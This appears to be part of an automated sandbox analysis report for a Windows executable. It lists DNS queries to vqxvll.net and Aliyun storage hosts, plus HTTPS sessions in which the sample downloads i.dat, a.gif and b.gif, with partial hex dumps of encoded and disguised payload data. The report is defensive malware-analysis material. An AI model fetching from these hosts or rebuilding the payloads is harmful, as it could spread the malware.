                                                                        Jan 14, 2025 05:17:31.253135920 CET1.1.1.1192.168.11.200x6ac7Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:36.251029968 CET1.1.1.1192.168.11.200xc86Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:41.249773026 CET1.1.1.1192.168.11.200x132bName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:46.265554905 CET1.1.1.1192.168.11.200xe59cName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:51.263927937 CET1.1.1.1192.168.11.200xc4eeName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:56.263178110 CET1.1.1.1192.168.11.200x8063Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:01.261929035 CET1.1.1.1192.168.11.200x93c4Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:06.260540962 CET1.1.1.1192.168.11.200xdfecName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:11.259990931 CET1.1.1.1192.168.11.200x5d72Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.197916031 CET9.9.9.9192.168.11.200x9bbdNo error (0)upitem.oss-cn-hangzhou.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.197916031 CET9.9.9.9192.168.11.200x9bbdNo error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.197916031 CET9.9.9.9192.168.11.200x9bbdNo error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.103A (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.822454929 CET1.1.1.1192.168.11.200x9bbdNo error (0)upitem.oss-cn-hangzhou.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.822454929 CET1.1.1.1192.168.11.200x9bbdNo error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.822454929 CET1.1.1.1192.168.11.200x9bbdNo error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.103A (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:16.291542053 CET1.1.1.1192.168.11.200x3c95Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:21.256675959 CET1.1.1.1192.168.11.200xd221Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:26.255892038 CET1.1.1.1192.168.11.200x92d8Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:31.260607958 CET1.1.1.1192.168.11.200xb80eName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:36.254328012 CET1.1.1.1192.168.11.200x477bName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:41.254609108 CET1.1.1.1192.168.11.200x3c62Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:48.112083912 CET1.1.1.1192.168.11.200x7962Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:54.235502005 CET1.1.1.1192.168.11.200x6a96Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:00.357979059 CET1.1.1.1192.168.11.200xc469Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:06.482357979 CET1.1.1.1192.168.11.200xb42cName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:12.606764078 CET1.1.1.1192.168.11.200xe752Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:18.729330063 CET1.1.1.1192.168.11.200x40b3Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:24.852226019 CET1.1.1.1192.168.11.200x659eName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • vien3h.oss-cn-beijing.aliyuncs.com
                                                                        • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        • upitem.oss-cn-hangzhou.aliyuncs.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.11.204975339.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:10:59 UTC105OUTGET /i.dat HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:10:59 UTC558INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:10:59 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 512
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3D39F6B60353333921E
                                                                        Accept-Ranges: bytes
                                                                        ETag: "C92063FD4E148F2D2386C0DA8E46E701"
                                                                        Last-Modified: Mon, 13 Jan 2025 12:22:07 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 8416026672269937305
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000113
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: ySBj/U4Ujy0jhsDajkbnAQ==
                                                                        x-oss-server-time: 19
                                                                        2025-01-14 04:10:59 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 46 59 55 5e 6d 36 70 31 42 42 1c 52 3c 7f 30 37 5e 5d 5e 59 3e 77 38 35 5c 4c 40 5b 38 28 75 38 57 55 17 59 77 3e 30 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 57 4b 4b 4f 3c 75 60 60 16 09 05 0e 3d 66 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 45 5a 56 5d 6e 35 73 32 41 41 1f 51 3f 7c 33 34 5d 5e 5d 5a 3d 74 3b 36 5f 4f 43 58 3b 2b 76 3b 54 56 14 58 76 3f 31 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 56 4a 4a 4e 3d 74 61 61 17 08 04 0f 3c 67 21
                                                                        Data Ascii: l%00FYU^m6p1BBR<07^]^Y>w85\L@[8(u8WUYw>0?????????????????????????????????WKKO<u``=f aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33EZV]n5s2AAQ?|34]^]Z=t;6_OCX;+v;TVXv?1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>VJJN=taa<g!


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.11.204975539.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:11:00 UTC105OUTGET /a.gif HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:11:01 UTC546INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:11:00 GMT
                                                                        Content-Type: image/gif
                                                                        Content-Length: 135589
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3D45DFDD13639A7E1D0
                                                                        Accept-Ranges: bytes
                                                                        ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                                        Last-Modified: Mon, 13 Jan 2025 12:21:20 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 8642451798640735006
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000104
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                                        x-oss-server-time: 25
                                                                        2025-01-14 04:11:01 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                                                        Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                                                        Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                                                        Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                                                        Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                                                        Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                                                        Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                                                        Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                                                        Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                                                        2025-01-14 04:11:01 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                                                        Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.11.204975739.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:11:03 UTC105OUTGET /b.gif HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:11:03 UTC547INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:11:03 GMT
                                                                        Content-Type: image/gif
                                                                        Content-Length: 125333
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3D7F5B7DD3233A86FAB
                                                                        Accept-Ranges: bytes
                                                                        ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                        Last-Modified: Mon, 13 Jan 2025 12:21:19 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 10333201072197591521
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000104
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                        x-oss-server-time: 21
                                                                        2025-01-14 04:11:03 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                                        Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
